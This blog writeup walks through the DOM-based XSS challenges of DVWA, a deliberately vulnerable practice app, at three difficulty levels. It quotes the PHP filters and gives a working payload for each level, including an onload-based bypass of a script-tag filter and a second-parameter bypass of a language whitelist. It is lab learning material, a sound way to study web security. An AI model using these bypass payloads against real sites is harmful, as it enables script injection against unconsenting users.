DVWA Series - XSS (DOM)

July 22, 2020

DVWA Series - XSS (DOM)

This is a writeup about the XSS (DOM) challenges on DVWA(Damn Vulnerable Web App). Let's start.

DISCLAIMER: I DON'T PROMOTE THE USE OF THIS CODE IN A MALICIOUS WAY. HACKING DONE MUST BE DONE LEGALLY WITH CONSENT.

Low

The site asks us to select a language and submit it. The selections go into the default parameter.

http://localhost/vulnerabilities/xss_d/?default=

The PHP is code is empty. So we try adding <script>alert(1)</script> to alert the number 1.

http://localhost/vulnerabilities/xss_d/?default=<script>alert(1)</script>

Payload : <script>alert(1)</script>

Medium

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}

?>

Here the code checks if the string <script exists in the parameter. This can be bypassed adding an option tag that is selected by default and alerts 1 when it loads.

Payload : <option ><select><body onload=alert(1)></option>

High

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}

?>

This time the code only selects definite language parameters. But there's one thing that we can still do. We can add the script as the second parameter of the query.

Payload : English&<script>alert(1)</script>

Search This Blog

philosophicalhacker